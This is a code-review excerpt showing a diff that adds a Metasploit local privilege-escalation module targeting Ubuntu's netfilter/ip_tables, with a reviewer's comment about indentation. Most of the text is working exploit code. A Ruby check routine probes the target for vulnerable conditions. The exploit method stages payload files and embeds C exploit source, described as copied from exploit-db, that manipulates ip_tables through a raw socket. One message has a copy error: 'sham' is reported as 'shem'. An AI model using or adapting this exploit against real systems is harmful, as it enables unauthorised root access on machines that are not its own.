modules/exploits/linux/local/ubuntu_netfilter.rb

```diff
@@ -0,0 +1,332 @@
+      if iptables.include?('ip_tables')
+        vprint_good('ip_tables.ko is loaded')
+      else
+        print_error('ip_tables.ko is not loaded.  root needs to run iptables -L or similar command')
+      end
+      return iptables.include?('ip_tables')
+    end
+
+    def libs_installed?()
+      # user@ubuntu:~$ dpkg --get-selections | grep libc6-dev-i386
+      # libc6-dev-i386					install
+      vprint_status('Checking if libc6-dev-i386 is installed')
+      lib = cmd_exec('dpkg --get-selections | grep libc6-dev-i386')
+      if lib.include?('install')
+        vprint_good('libc6-dev-i386 is installed')
+      else
+        print_error('libc6-dev-i386 is not installed.  Compiling will fail.')
+      end
+      return lib.include?('install')
+    end
+
+    def shemsham_installed?()
+      # we want this to be false.
+      vprint_status('Checking if shem or sham are installed')
+      shemsham = cmd_exec('cat /proc/cpuinfo')
+      if shemsham.include?('shem')
+        print_error('shem installed, system not vulnerable.')
+      elsif shemsham.include?('sham')
+        print_error('shem installed, system not vulnerable.')
+      else
+        vprint_good('shem and sham not present.')
+      end
+      return (shemsham.include?('shem') or shemsham.include?('sham'))
+    end
+
+    if libs_installed?() and iptables_loaded?() and not shemsham_installed?()
+      return CheckCode::Appears
+    else
+      return CheckCode::Safe
+    end
+  end
+
+  def exploit
+
+    desc_file = datastore["WritableDir"] + "/" + rand_text_alphanumeric(8)
+    env_ready_file = datastore["WritableDir"] + "/" + rand_text_alphanumeric(8)
+    pwn_file = datastore["WritableDir"] + "/" + rand_text_alphanumeric(8)
+    payload_file = rand_text_alpha(8)
+    payload_path = "#{datastore["WritableDir"]}/#{payload_file}"
+
+    # direct copy of code from exploit-db, except removed the check for shem/sham and ip_tables.ko since we can do that in the check area here
+    decr = %q{
+      #define _GNU_SOURCE
+      #include <stdio.h>
+      #include <stdlib.h>
+      #include <string.h>
+      #include <unistd.h>
+      #include <sched.h>
+      #include <linux/sched.h>
+      #include <errno.h>
+      #include <sys/types.h>
+      #include <sys/socket.h>
+      #include <sys/ptrace.h>
+      #include <netinet/in.h>
+      #include <net/if.h>
+      #include <linux/netfilter_ipv4/ip_tables.h>
+      #include <linux/netlink.h>
+      #include <fcntl.h>
+      #include <sys/mman.h>
+
+      #define MALLOC_SIZE 66*1024
+
+      int decr(void *p) {
+          int sock, optlen;
+          int ret;
+          void *data;
+          struct ipt_replace *repl;
+          struct ipt_entry *entry;
+          struct xt_entry_match *ematch;
+          struct xt_standard_target *target;
+          unsigned i;
+
+          sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW);
+
+          if (sock == -1) {
+                  perror("socket");
```

Comment:
Minor nit (I realize this is copy-pasted code), maybe make the indentation here match the 4-space indentation that follows in this C code...